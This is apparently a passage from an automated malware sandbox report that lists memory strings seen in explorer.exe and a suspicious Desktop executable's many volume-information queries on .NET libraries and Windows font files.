          Source: explorer.exe, 0000001E.00000003.482390182.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.603220789.0000000005310000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.484477118.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.483606549.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.501287373.0000000005318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.481101139.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.480692412.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.495943991.0000000005318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.486147134.0000000005353000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd/
          Source: explorer.exe, 0000000F.00000000.360548916.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.430748088.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.379669641.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.342229974.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 0000000F.00000000.342798346.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.361461353.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.431057607.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.379876329.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000F.00000000.368905426.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.352777288.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.386085770.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
